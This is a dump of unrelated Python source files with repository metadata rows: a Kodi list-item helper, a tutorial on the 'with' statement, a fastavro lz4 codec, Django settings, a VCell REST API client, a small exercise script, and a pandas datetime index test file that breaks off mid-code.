item["contextmenu"] = []
item["contextmenu"] += [
(xbmc.getLocalizedString(20364), "ActivateWindow(Video,videodb://tvshows/titles/%s/,return)"
% (item["tvshowid"])),
(xbmc.getLocalizedString(20373), "ActivateWindow(Video,videodb://tvshows/titles/%s/%s/,return)"
% (item["tvshowid"], item["season"]))]
if "contextmenu" in item:
liz.addContextMenuItems(item["contextmenu"])
if as_tuple:
return item["file"], liz, item.get("isFolder", False)
else:
return liz
except Exception as exc:
log_exception(__name__, exc)
log_msg(item)
return None
@staticmethod
def prepare_listitem(item):
"""helper to convert kodi output from json api to compatible format for listitems"""
try:
# fix values returned from json to be used as listitem values
properties = item.get("extraproperties", {})
# set type
for idvar in [
('episode', 'DefaultTVShows.png'),
('tvshow', 'DefaultTVShows.png'),
('movie', 'DefaultMovies.png'),
('song', 'DefaultAudio.png'),
('album', 'DefaultAudio.png'),
('artist', 'DefaultArtist.png'),
('musicvideo', 'DefaultMusicVideos.png'),
('recording', 'DefaultTVShows.png'),
('channel', 'DefaultAddonPVRClient.png')]:
dbid = item.get(idvar[0] + "id")
if dbid:
properties["DBID"] = str(dbid)
if not item.get("type"):
item["type"] = idvar[0]
if not item.get("icon"):
item["icon"] = idvar[1]
break
# general properties
if "genre" in item and isinstance(item['genre'], list):
item["genre"] = " / ".join(item['genre'])
if "studio" in item and isinstance(item['studio'], list):
item["studio"] = " / ".join(item['studio'])
if "writer" in item and isinstance(item['writer'], list):
item["writer"] = " / ".join(item['writer'])
if 'director' in item and isinstance(item['director'], list):
item["director"] = " / ".join(item['director'])
if 'artist' in item and not isinstance(item['artist'], list):
item["artist"] = [item['artist']]
if 'artist' not in item:
item["artist"] = []
if item['type'] == "album" and 'album' not in item and 'label' in item:
item['album'] = item['label']
if "duration" not in item and "runtime" in item:
if (item["runtime"] / 60) > 300:
item["duration"] = item["runtime"] / 60
else:
item["duration"] = item["runtime"]
if "plot" not in item and "comment" in item:
item["plot"] = item["comment"]
if "tvshowtitle" not in item and "showtitle" in item:
item["tvshowtitle"] = item["showtitle"]
if "premiered" not in item and "firstaired" in item:
item["premiered"] = item["firstaired"]
if "firstaired" in item and "aired" not in item:
item["aired"] = item["firstaired"]
if "imdbnumber" not in properties and "imdbnumber" in item:
properties["imdbnumber"] = item["imdbnumber"]
if "imdbnumber" not in properties and "uniqueid" in item:
for value in list(item["uniqueid"].values()):
if value.startswith("tt"):
properties["imdbnumber"] = value
properties["dbtype"] = item["type"]
properties["DBTYPE"] = item["type"]
properties["type"] = item["type"]
properties["path"] = item.get("file")
# cast
list_cast = []
list_castandrole = []
item["cast_org"] = item.get("cast", [])
if "cast" in item and isinstance(item["cast"], list):
for castmember in item["cast"]:
if isinstance(castmember, dict):
list_cast.append(castmember.get("name", ""))
list_castandrole.append((castmember["name"], castmember["role"]))
else:
list_cast.append(castmember)
list_castandrole.append((castmember, ""))
item["cast"] = list_cast
item["castandrole"] = list_castandrole
if "season" in item and "episode" in item:
properties["episodeno"] = "s%se%s" % (item.get("season"), item.get("episode"))
if "resume" in item:
properties["resumetime"] = str(item['resume']['position'])
properties["totaltime"] = str(item['resume']['total'])
properties['StartOffset'] = str(item['resume']['position'])
# streamdetails
if "streamdetails" in item:
streamdetails = item["streamdetails"]
audiostreams = streamdetails.get('audio', [])
videostreams = streamdetails.get('video', [])
subtitles = streamdetails.get('subtitle', [])
if len(videostreams) > 0:
stream = videostreams[0]
height = stream.get("height", "")
width = stream.get("width", "")
if height and width:
resolution = ""
if width <= 720 and height <= 480:
resolution = "480"
elif width <= 768 and height <= 576:
resolution = "576"
elif width <= 960 and height <= 544:
resolution = "540"
elif width <= 1280 and height <= 720:
resolution = "720"
elif width <= 1920 and height <= 1080:
resolution = "1080"
elif width * height >= 6000000:
resolution = "4K"
properties["VideoResolution"] = resolution
if stream.get("codec", ""):
properties["VideoCodec"] = str(stream["codec"])
if stream.get("aspect", ""):
properties["VideoAspect"] = str(round(stream["aspect"], 2))
item["streamdetails"]["video"] = stream
# grab details of first audio stream
if len(audiostreams) > 0:
stream = audiostreams[0]
properties["AudioCodec"] = stream.get('codec', '')
properties["AudioChannels"] = str(stream.get('channels', ''))
properties["AudioLanguage"] = stream.get('language', '')
item["streamdetails"]["audio"] = stream
# grab details of first subtitle
if len(subtitles) > 0:
properties["SubtitleLanguage"] = subtitles[0].get('language', '')
item["streamdetails"]["subtitle"] = subtitles[0]
else:
item["streamdetails"] = {}
item["streamdetails"]["video"] = {'duration': item.get('duration', 0)}
# additional music properties
if 'album_description' in item:
properties["Album_Description"] = item.get('album_description')
# pvr properties
if "starttime" in item:
# convert utc time to local time
item["starttime"] = localdate_from_utc_string(item["starttime"])
item["endtime"] = localdate_from_utc_string(item["endtime"])
# set some localized versions of the time and date as additional properties
startdate, starttime = localized_date_time(item['starttime'])
enddate, endtime = localized_date_time(item['endtime'])
properties["StartTime"] = starttime
properties["StartDate"] = startdate
properties["EndTime"] = endtime
properties["EndDate"] = enddate
properties["Date"] = "%s %s-%s" % (startdate, starttime, endtime)
properties["StartDateTime"] = "%s %s" % (startdate, starttime)
properties["EndDateTime"] = "%s %s" % (enddate, endtime)
# set date to startdate
item["date"] = arrow.get(item["starttime"]).format("DD.MM.YYYY")
if "channellogo" in item:
properties["channellogo"] = item["channellogo"]
properties["channelicon"] = item["channellogo"]
if "episodename" in item:
properties["episodename"] = item["episodename"]
if "channel" in item:
properties["channel"] = item["channel"]
properties["channelname"] = item["channel"]
item["label2"] = item["title"]
# artwork
art = item.get("art", {})
if item["type"] in ["episode", "season"]:
if not art.get("fanart") and art.get("season.fanart"):
art["fanart"] = art["season.fanart"]
if not art.get("poster") and art.get("season.poster"):
art["poster"] = art["season.poster"]
if not art.get("landscape") and art.get("season.landscape"):
art["poster"] = art["season.landscape"]
if not art.get("fanart") and art.get("tvshow.fanart"):
art["fanart"] = art.get("tvshow.fanart")
if not art.get("poster") and art.get("tvshow.poster"):
art["poster"] = art.get("tvshow.poster")
if not art.get("clearlogo") and art.get("tvshow.clearlogo"):
art["clearlogo"] = art.get("tvshow.clearlogo")
if not art.get("banner") and art.get("tvshow.banner"):
art["banner"] = art.get("tvshow.banner")
if not art.get("landscape") and art.get("tvshow.landscape"):
art["landscape"] = art.get("tvshow.landscape")
if not art.get("fanart") and item.get('fanart'):
art["fanart"] = item.get('fanart')
if not art.get("thumb") and item.get('thumbnail'):
art["thumb"] = get_clean_image(item.get('thumbnail'))
if not art.get("thumb") and art.get('poster'):
art["thumb"] = get_clean_image(art.get('poster'))
if not art.get("thumb") and item.get('icon'):
art["thumb"] = get_clean_image(item.get('icon'))
if not item.get("thumbnail") and art.get('thumb'):
item["thumbnail"] = art["thumb"]
            # clean art: drop non-string values and resolve image:// paths
            if sys.version_info.major == 3:
                for key, value in list(art.items()):
                    if not isinstance(value, str):
                        art[key] = ""
                    elif value:
                        art[key] = get_clean_image(value)
            else:
                for key, value in list(art.items()):
                    if not isinstance(value, basestring):
                        art[key] = ""
                    elif value:
                        art[key] = get_clean_image(value)
item["art"] = art
item["extraproperties"] = properties
if "file" not in item:
log_msg("Item is missing file path ! --> %s" % item["label"], xbmc.LOGWARNING)
item["file"] = ""
# return the result
return item
except Exception as exc:
log_exception(__name__, exc)
log_msg(item)
return None
@staticmethod
def tvshow_watchedcounts(tvshow):
"""append watched counts to tvshow details"""
tvshow["extraproperties"] = {"totalseasons": str(tvshow["season"]),
"totalepisodes": str(tvshow["episode"]),
"watchedepisodes": str(tvshow["watchedepisodes"]),
"unwatchedepisodes": str(tvshow["episode"] - tvshow["watchedepisodes"])
}
return tvshow
| 48.207171 | 119 | 0.53011 |
45e1c3f612bcaf9f13501d36cc807cdd282d28c1 | 1,426 | py | Python |
function/with.py | Max-PJB/python-learning2 | e8b05bef1574ee9abf8c90497e94ef20a7f4e3bd | ["MIT"] | null | null | null |
function/with.py | Max-PJB/python-learning2 | e8b05bef1574ee9abf8c90497e94ef20a7f4e3bd | ["MIT"] | null | null | null |
function/with.py | Max-PJB/python-learning2 | e8b05bef1574ee9abf8c90497e94ef20a7f4e3bd | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
@ Author : Max_Pengjb
@ date : 2018/9/23 22:37
@ IDE : PyCharm
@ GitHub : https://github.com/JackyPJB
@ Contact : pengjianbiao@hotmail.com
-------------------------------------------------
Description :
-------------------------------------------------
"""
__author__ = 'Max_Pengjb'
"""
with如何工作?
这看起来充满魔法,但不仅仅是魔法,Python对with的处理还很聪明。基本思想是with所求值的对象必须有一个__enter__()方法,一个__exit__()方法。
紧跟with后面的语句被求值后,返回对象的__enter__()方法被调用,这个方法的返回值将被赋值给as后面的变量。当with后面的代码块全部被执行完之后,将调用前面返回对象的__exit__()方法。
"""
class Sample:
def __enter__(self):
print("In __enter__()")
def __init__(self):
pass
def __exit__(self, type, value, trace):
print("In __exit__()")
print("type:", type)
print("value:", value)
print("trace:", trace)
def do_something(self):
bar = 1/0
return bar + 10
with Sample() as sample:
print("sample:", sample)
"""
正如你看到的,
1.__enter__()方法被执行
2.__enter__()方法返回的值 - 这个例子中是"Foo",赋值给变量'sample'
3.执行代码块,打印变量"sample"的值为"Foo"
4.__exit__()方法被调用with真正强大之处是它可以处理异常。可能你已经注意到Sample类的__exit__方法有三个参数 - val, type和trace。
这些参数在异常处理中相当有用。我们来改一下代码,看看具体如何工作的。
"""
# with Sample() as sample:
# sample.do_something()
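# Illustrative sketch (added; not part of the original exercise): to actually watch __exit__()
# receive the exception information described above, the error has to be raised inside the
# with-block. __exit__() prints the ZeroDivisionError's type/value/trace and, because it does
# not return True, the exception is re-raised, so we catch it here to keep the script running.
try:
    with Sample():
        1 / 0
except ZeroDivisionError as err:
    print("exception re-raised after __exit__():", err)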
sa = Sample()
sa.do_something()
| 24.169492 | 102 | 0.556802 |
d63e20b26ae2ab0528b0cae1dcad7ea96037d772 | 240 | py | Python |
src/fastavro_codecs/_lz4.py | rolando/fastavro-codecs | 40b319557d056f36fbfcf292fe0c4372f88c0d37 | ["MIT"] | 1 | 2017-07-20T16:36:02.000Z | 2017-07-20T16:36:02.000Z |
src/fastavro_codecs/_lz4.py | rmax/fastavro-codecs | 40b319557d056f36fbfcf292fe0c4372f88c0d37 | ["MIT"] | null | null | null |
src/fastavro_codecs/_lz4.py | rmax/fastavro-codecs | 40b319557d056f36fbfcf292fe0c4372f88c0d37 | ["MIT"] | null | null | null |
from lz4 import compress, decompress
from ._base import BaseCodec
class Lz4Codec(BaseCodec):
# TODO: Unreleased version of lz4 support compression arguments.
encode = staticmethod(compress)
decode = staticmethod(decompress)
| 21.818182 | 68 | 0.766667 |
b0d49d8fae0818a4fade847c9dc637e51e8862d8 | 127 | py | Python |
backend/couscous/settings/production.py | jimmykamau/couscous | 97a1b36e159df39239e3485bd90be0639aa44d38 | ["MIT"] | 1 | 2020-10-26T10:23:58.000Z | 2020-10-26T10:23:58.000Z |
backend/couscous/settings/production.py | jimmykamau/couscous | 97a1b36e159df39239e3485bd90be0639aa44d38 | ["MIT"] | 9 | 2019-11-21T12:43:42.000Z | 2022-02-10T14:18:01.000Z |
backend/couscous/settings/production.py | jimmykamau/couscous | 97a1b36e159df39239e3485bd90be0639aa44d38 | ["MIT"] | null | null | null |
import json
import os
from couscous.settings.base import *
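# ALLOWED_HOSTS is read below as a JSON-encoded list from the environment,
# e.g. ALLOWED_HOSTS='["example.com", "www.example.com"]' (hostnames here are
# placeholders); it falls back to an empty list when the variable is unset.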
ALLOWED_HOSTS = json.loads(os.environ.get('ALLOWED_HOSTS', '[]'))
| 18.142857 | 65 | 0.748031 |
587d3977530b085ff615e2277aa2e32a67ab1ae8 | 10,886 | py | Python |
pythonScripts/VCell_API/vcellapi.py | vcellmike/Biosimulators_VCell | b313f9c46ea78815505959e994ba3744ab49ada0 | ["MIT"] | 38 | 2017-09-08T08:51:43.000Z | 2022-02-08T02:25:19.000Z |
pythonScripts/VCell_API/vcellapi.py | vcellmike/Biosimulators_VCell | b313f9c46ea78815505959e994ba3744ab49ada0 | ["MIT"] | 79 | 2018-04-01T16:37:58.000Z | 2022-03-30T18:10:23.000Z |
pythonScripts/VCell_API/vcellapi.py | vcellmike/Biosimulators_VCell | b313f9c46ea78815505959e994ba3744ab49ada0 | ["MIT"] | 17 | 2017-09-12T18:21:56.000Z | 2022-01-04T19:49:35.000Z |
import requests
import hashlib
class BiomodelsQuerySpec(object):
def __init__(self):
self.bmName="";
self.bmId="";
self.category="all";
self.owner="";
self.savedLow="";
self.savedHigh="";
self.startRow="";
self.maxRows="10";
self.orderBy="date_desc";
def getQueryString(self):
return "bmName="+self.bmName+"&"+ \
"bmId="+self.bmId+"&"+ \
"category="+self.category+"&"+ \
"owner="+self.owner+"&"+ \
"savedLow="+self.savedLow+"&"+ \
"savedHigh="+self.savedHigh+"&"+ \
"startRow="+self.startRow+"&"+ \
"maxRows="+self.maxRows+"&"+ \
"orderBy="+self.orderBy;
class SimulationTasksQuerySpec(object):
def __init__(self):
self.submitLow = "";
self.submitHigh = "";
self.startRow = "1";
self.maxRows = "10";
self.serverId = ""; # "alpha"
self.computeHost = ""; # "signode10"
self.simId = "";
self.jobId = "";
self.taskId = "";
self.hasData = "all"; # "all", "yes", "no"
self.waiting = "on";
self.queued = "on";
self.dispatched = "on";
self.running = "on";
self.completed = "on";
self.failed = "on";
self.stopped = "on";
def getQueryString(self):
return "submitLow"+"="+self.submitLow+"&"+ \
"submitHigh"+"="+self.submitHigh+"&"+ \
"startRow"+"="+self.startRow+"&"+ \
"maxRows"+"="+self.maxRows+"&"+ \
"serverId"+"="+self.serverId+"&"+ \
"computeHost"+"="+self.computeHost+"&"+ \
"simId"+"="+self.simId+"&"+ \
"jobId"+"="+self.jobId+"&"+ \
"taskId"+"="+self.taskId+"&"+ \
"hasData"+"="+self.hasData+"&"+ \
"waiting"+"="+self.waiting+"&"+ \
"queued"+"="+self.queued+"&"+ \
"dispatched"+"="+self.dispatched+"&"+ \
"running"+"="+self.running+"&"+ \
"completed"+"="+self.completed+"&"+ \
"failed"+"="+self.failed+"&"+ \
"stopped"+"="+self.stopped;
class AccessToken(object):
def __init__(self):
self.token = ""
self.creationDateSeconds = 0;
self.expireDateSeconds = 0;
self.userId = "";
self.userKey = "";
def loadJSON(self, accessToken_dict):
self.__dict__.update(accessToken_dict)
class MathModelLink(object):
def __init__(self):
self.mathModelKey = "";
self.mathModelBranchId = "";
self.mathModelName = "";
class BioModelLink(object):
def __init__(self):
self.bioModelKey = "";
self.bioModelBranchId = "";
self.bioModelName = "";
self.simContextKey = "";
self.simContextBranchId = "";
self.simContextName = "";
class Application(object):
def __init__(self):
self.key = "";
self.branchId = "";
self.name = "";
self.ownerName = "";
self.ownerKey = "";
self.mathKey = "";
def loadJSON(self, json_dictionary):
self.__dict__.update(json_dictionary)
class Simulation(object):
def __init__(self):
self.key = "";
self.branchId = "";
self.name = "";
self.ownerName = "";
self.ownerKey = "";
self.mathKey = "";
self.solverName = "";
self.scanCount = -1;
self.mathModelLink = None;
self.bioModelLink = None;
def loadJSON(self,simulation_dict):
self.__dict__.update(simulation_dict)
if (self.bioModelLink != None):
link = BioModelLink()
link.__dict__.update(self.bioModelLink)
self.bioModelLink = link
if (self.mathModelLink != None):
link = MathModelLink()
            link.__dict__.update(self.mathModelLink)
self.mathModelLink = link
class SimulationTask(object):
def __init__(self):
self.simKey = "";
self.simName = "";
self.userName = "";
self.userKey = "";
self.htcJobId = "";
self.status = "";
self.startdate = None;
self.jobIndex = None;
self.taskId = None;
self.message = "";
self.site = "";
self.computeHost = "";
self.schedulerStatus = "";
self.hasData = None;
self.scanCount = None;
self.mathModelLink = None;
self.bioModelLink = None;
def loadJSON(self, simTask_dict):
self.__dict__.update(simTask_dict)
if (self.bioModelLink != None):
link = BioModelLink()
link.__dict__.update(self.bioModelLink)
self.bioModelLink = link
if (self.mathModelLink != None):
link = MathModelLink()
            link.__dict__.update(self.mathModelLink)
self.mathModelLink = link
class Biomodel(object):
def __init__(self):
self.bmKey = "";
self.name = "";
self.privacy = -1;
self.groupUsers = { "" };
self.savedDate = -1;
self.annot = "";
self.branchID = "";
self.modelKey = "";
self.ownerName = ""
self.ownerKey = "";
self.simulations = [];
self.applications = [];
def loadJSON(self,biomodel_dict):
self.__dict__.update(biomodel_dict)
if (self.applications != None):
apps = [];
for application_dict in self.applications:
a = Application()
a.loadJSON(application_dict)
apps.append(a)
self.applications = apps
if (self.simulations != None):
sims = [];
for simulation_dict in self.simulations:
s = Simulation()
s.loadJSON(simulation_dict)
sims.append(s)
self.simulations = sims
class VCellApi(object):
def __init__(self, host, port, clientID): # (self, host, port, clientID, bIgnoreCertProblem, bIgnoreHostMismatch):
self.host = host
self.port = port
self.clientID = clientID
#self.bIgnoreCertProblem = bIgnoreCertProblem
#self.bIgnoreHostMismatch = bIgnoreHostMismatch
self.userid = None;
        self.password = None;
self.access_token = None; # '30fead75-4f3e-40af-88c5-3623e3228858';
def _getResponse(self,url,bRequiresAuth):
if (self.access_token == None):
if (bRequiresAuth == False):
response = requests.get(url)
else:
raise AssertionError("call requires authentication")
else:
response = requests.get(url, auth=('access_token', self.access_token))
if (response.status_code != 200):
print("url "+url+" returned with unexpected status "+str(response.status_code))
raise Exception("url "+url+" returned with unexpected status "+str(response.status_code))
return response
def _post(self,url,bRequiresAuth):
if (self.access_token == None):
if (bRequiresAuth == False):
response = requests.post(url)
else:
raise AssertionError("call requires authentication")
else:
response = requests.get(url, auth=('access_token', self.access_token))
if (response.status_code != 200):
print("url "+url+" returned with unexpected status "+str(response.status_code))
raise Exception("url "+url+" returned with unexpected status "+str(response.status_code))
return response
def authenticate(self,userid,clearTextPassword):
m = hashlib.sha1()
        m.update(clearTextPassword.encode('utf-8'));  # hashlib requires bytes under Python 3
digestedPassword = m.hexdigest().upper()
url = 'https://'+self.host+":"+str(self.port)+"/access_token?user_id="+userid+"&user_password="+digestedPassword+"&client_id="+self.clientID
accessTokenResponse = requests.get(url);
accessToken = AccessToken()
accessToken.loadJSON(accessTokenResponse.json())
self.access_token = accessToken.token
def logout(self):
        self.access_token = None;
def getBiomodel(self,biomodelID):
biomodelResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID),False)
biomodel = Biomodel()
biomodel.loadJSON(biomodelResponse.json())
assert isinstance(biomodel,Biomodel)
return biomodel
def getBiomodels(self,biomodelsQuerySpec):
assert isinstance(biomodelsQuerySpec,BiomodelsQuerySpec) or biomodelsQuerySpec == None
if (biomodelsQuerySpec == None):
biomodelsQuerySpec = BiomodelsQuerySpec()
biomodelsResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/biomodel?'+biomodelsQuerySpec.getQueryString(),False)
biomodels = [];
for biomodel_dict in biomodelsResponse.json():
b = Biomodel()
b.loadJSON(biomodel_dict)
biomodels.append(b)
return biomodels
def getSimulation(self, biomodelID, simKey):
simulationResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID)+'/simulation/'+str(simKey), False)
s = Simulation()
s.loadJSON(simulationResponse.json());
assert isinstance(s,Simulation)
return s
def getSimulationTasks(self, simTasksQuerySpec):
assert isinstance(simTasksQuerySpec,SimulationTasksQuerySpec) or simTasksQuerySpec == None
if (simTasksQuerySpec == None):
simTasksQuerySpec = SimulationTasksQuerySpec()
simTasksResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/simtask?'+simTasksQuerySpec.getQueryString(), True)
simTasks = [];
for simTask_dict in simTasksResponse.json():
s = SimulationTask()
s.loadJSON(simTask_dict)
simTasks.append(s)
return simTasks
def startSimulation(self, biomodelID, simKey):
simulationStartResponse = self._post('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID)+'/simulation/'+str(simKey)+'/startSimulation', True)
simTasks = [];
for simTask_dict in simulationStartResponse.json():
s = SimulationTask()
s.loadJSON(simTask_dict)
simTasks.append(s)
return simTasks
def stopSimulation(self, biomodelID, simKey):
simulationStopResponse = self._post('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID)+'/simulation/'+str(simKey)+'/stopSimulation', True)
simTasks = [];
        for simTask_dict in simulationStopResponse.json():
s = SimulationTask()
s.loadJSON(simTask_dict)
simTasks.append(s)
return simTasks
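# Illustrative usage sketch (added; the host, port, client id and query values below are
# placeholders, not a real VCell deployment). getBiomodels() issues an unauthenticated
# request in this client, so authenticate() is not needed for this particular query.
if __name__ == "__main__":
    api = VCellApi("vcellapi.example.org", 8080, "myClientId")
    query = BiomodelsQuerySpec()
    query.maxRows = "5"
    for biomodel in api.getBiomodels(query):
        print(biomodel.name, biomodel.bmKey)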
| 34.01875 | 166 | 0.568804 |
4dda4c0f37286d640127b1f855658e57c4b43f89 | 537 | py | Python |
Exercícios/Ex.92.py | mattheuslima/Projetos-Curso_Python | ab4cab98fe69b70245b5bcf41edd0febe823ac6a | ["MIT"] | null | null | null |
Exercícios/Ex.92.py | mattheuslima/Projetos-Curso_Python | ab4cab98fe69b70245b5bcf41edd0febe823ac6a | ["MIT"] | null | null | null |
Exercícios/Ex.92.py | mattheuslima/Projetos-Curso_Python | ab4cab98fe69b70245b5bcf41edd0febe823ac6a | ["MIT"] | null | null | null |
from datetime import datetime
trabalhador={"Nome":str(input("Qual o nome? ")),
"Ano de nascimento":int(input("Qual o ano de nascimento: ")),
"CTPS":int(input("Qual o número da CTPS (0 se não tem) ")),
"Ano de contratação":int(input("Qual o ano de contratação? ")),
"Salário":int(input("Qual o salário ? R$ "))
}
trabalhador["Idade"]=datetime.now().year-trabalhador["Ano de nascimento"]
print('-='*20)
for k,v in trabalhador.items():
print(f'- O {k} tem o valor {v}')
| 41.307692 | 76 | 0.590317 |
b577496467257e6ddd69259ebf0b4845b9e49837 | 261 | py | Python |
plutoid_web/logger.py | manasgarg/plutoid-web | ff5aa0657d04ea298ad3f33dd2a61eaf22b3acf6 | ["MIT"] | null | null | null |
plutoid_web/logger.py | manasgarg/plutoid-web | ff5aa0657d04ea298ad3f33dd2a61eaf22b3acf6 | ["MIT"] | null | null | null |
plutoid_web/logger.py | manasgarg/plutoid-web | ff5aa0657d04ea298ad3f33dd2a61eaf22b3acf6 | ["MIT"] | null | null | null |
from fluent.sender import FluentSender
fluent_sender = None
def log(label, data):
if fluent_sender: fluent_sender.emit(label, data)
else: print(label, data)
def init_logger(prefix):
global fluent_sender
fluent_sender = FluentSender(prefix)
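# Illustrative usage sketch (added): init_logger() wires up a FluentSender for the given tag
# prefix; until it is called, log() simply prints to stdout. The "plutoid" prefix and the
# event payload below are placeholder values.
if __name__ == "__main__":
    log("request", {"path": "/health"})   # no sender configured yet -> printed
    init_logger("plutoid")                # assumes a fluentd agent on localhost:24224
    log("request", {"path": "/health"})   # emitted through the FluentSender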
| 18.642857 | 53 | 0.747126 |
7707a963451108b8985e38659685a50889b5aef0 | 606 | py | Python |
debug/debugc_warp_mlogistic.py | gitter-badger/fdasrsf_python | f59bd74b570662c17a1a042556d4887e6a75fa3e | ["BSD-3-Clause"] | 34 | 2017-02-17T13:48:49.000Z | 2022-02-27T11:17:14.000Z |
debug/debugc_warp_mlogistic.py | gitter-badger/fdasrsf_python | f59bd74b570662c17a1a042556d4887e6a75fa3e | ["BSD-3-Clause"] | 23 | 2018-05-21T20:12:26.000Z | 2022-03-28T23:19:10.000Z |
debug/debugc_warp_mlogistic.py | gitter-badger/fdasrsf_python | f59bd74b570662c17a1a042556d4887e6a75fa3e | ["BSD-3-Clause"] | 12 | 2018-03-07T13:16:06.000Z | 2021-12-31T05:21:53.000Z |
import numpy as np
import fdasrsf as fs
import mlogit_warp as mw
import h5py
fun = h5py.File('/Users/jdtucker/Documents/Research/fdasrsf/debug/debug_data.h5')
q = fun['q'][:]
y = fun['y'][:]
time = fun['time'][:]
alpha = fun['alpha'][:]
beta = fun['beta'][:]
max_itr = 10000 # 4000
tol = 1e-10
delta = .01
display = 1
gam_old = mw.mlogit_warp(np.ascontiguousarray(alpha),
np.ascontiguousarray(beta),
time, np.ascontiguousarray(q),
np.ascontiguousarray(y, dtype=np.int32), max_itr,
tol, delta, display)
| 26.347826 | 81 | 0.587459 |
0017271fe6c97d5b25c417a478bc01bca643f88f | 53,037 | py | Python |
pandas/tests/indexes/test_datetimelike.py | RTBHOUSE/pandas | e27b29697f0dcf9359f01a19edb2f20c6d728b6c | ["PSF-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause"] | 1 | 2019-10-24T09:00:26.000Z | 2019-10-24T09:00:26.000Z |
pandas/tests/indexes/test_datetimelike.py | RTBHOUSE/pandas | e27b29697f0dcf9359f01a19edb2f20c6d728b6c | ["PSF-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause"] | null | null | null |
pandas/tests/indexes/test_datetimelike.py | RTBHOUSE/pandas | e27b29697f0dcf9359f01a19edb2f20c6d728b6c | ["PSF-2.0", "Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause"] | 3 | 2019-12-24T18:46:58.000Z | 2021-09-04T11:57:13.000Z |
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta, time, date
import numpy as np
from pandas import (DatetimeIndex, Float64Index, Index, Int64Index,
NaT, Period, PeriodIndex, Series, Timedelta,
TimedeltaIndex, date_range, period_range,
timedelta_range, notnull)
import pandas.util.testing as tm
import pandas as pd
from pandas.tslib import Timestamp, OutOfBoundsDatetime
from .common import Base
class DatetimeLike(Base):
def test_shift_identity(self):
idx = self.create_index()
self.assert_index_equal(idx, idx.shift(0))
def test_str(self):
# test the string repr
idx = self.create_index()
idx.name = 'foo'
self.assertFalse("length=%s" % len(idx) in str(idx))
self.assertTrue("'foo'" in str(idx))
self.assertTrue(idx.__class__.__name__ in str(idx))
if hasattr(idx, 'tz'):
if idx.tz is not None:
self.assertTrue(idx.tz in str(idx))
if hasattr(idx, 'freq'):
self.assertTrue("freq='%s'" % idx.freqstr in str(idx))
def test_view(self):
super(DatetimeLike, self).test_view()
i = self.create_index()
i_view = i.view('i8')
result = self._holder(i)
tm.assert_index_equal(result, i)
i_view = i.view(self._holder)
result = self._holder(i)
tm.assert_index_equal(result, i_view)
class TestDatetimeIndex(DatetimeLike, tm.TestCase):
_holder = DatetimeIndex
_multiprocess_can_split_ = True
def setUp(self):
self.indices = dict(index=tm.makeDateIndex(10))
self.setup_indices()
def create_index(self):
return date_range('20130101', periods=5)
def test_shift(self):
# test shift for datetimeIndex and non datetimeIndex
# GH8083
drange = self.create_index()
result = drange.shift(1)
expected = DatetimeIndex(['2013-01-02', '2013-01-03', '2013-01-04',
'2013-01-05',
'2013-01-06'], freq='D')
self.assert_index_equal(result, expected)
result = drange.shift(-1)
expected = DatetimeIndex(['2012-12-31', '2013-01-01', '2013-01-02',
'2013-01-03', '2013-01-04'],
freq='D')
self.assert_index_equal(result, expected)
result = drange.shift(3, freq='2D')
expected = DatetimeIndex(['2013-01-07', '2013-01-08', '2013-01-09',
'2013-01-10',
'2013-01-11'], freq='D')
self.assert_index_equal(result, expected)
def test_construction_with_alt(self):
i = pd.date_range('20130101', periods=5, freq='H', tz='US/Eastern')
i2 = DatetimeIndex(i, dtype=i.dtype)
self.assert_index_equal(i, i2)
i2 = DatetimeIndex(i.tz_localize(None).asi8, tz=i.dtype.tz)
self.assert_index_equal(i, i2)
i2 = DatetimeIndex(i.tz_localize(None).asi8, dtype=i.dtype)
self.assert_index_equal(i, i2)
i2 = DatetimeIndex(
i.tz_localize(None).asi8, dtype=i.dtype, tz=i.dtype.tz)
self.assert_index_equal(i, i2)
# localize into the provided tz
i2 = DatetimeIndex(i.tz_localize(None).asi8, tz='UTC')
expected = i.tz_localize(None).tz_localize('UTC')
self.assert_index_equal(i2, expected)
# incompat tz/dtype
self.assertRaises(ValueError, lambda: DatetimeIndex(
i.tz_localize(None).asi8, dtype=i.dtype, tz='US/Pacific'))
def test_pickle_compat_construction(self):
pass
def test_construction_index_with_mixed_timezones(self):
# GH 11488
# no tz results in DatetimeIndex
result = Index([Timestamp('2011-01-01'),
Timestamp('2011-01-02')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01'),
Timestamp('2011-01-02')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# same tz results in DatetimeIndex
result = Index([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='Asia/Tokyo')],
name='idx')
exp = DatetimeIndex(
[Timestamp('2011-01-01 10:00'), Timestamp('2011-01-02 10:00')
], tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# same tz results in DatetimeIndex (DST)
result = Index([Timestamp('2011-01-01 10:00', tz='US/Eastern'),
Timestamp('2011-08-01 10:00', tz='US/Eastern')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-08-01 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# different tz results in Index(dtype=object)
result = Index([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
name='idx')
exp = Index([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
result = Index([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
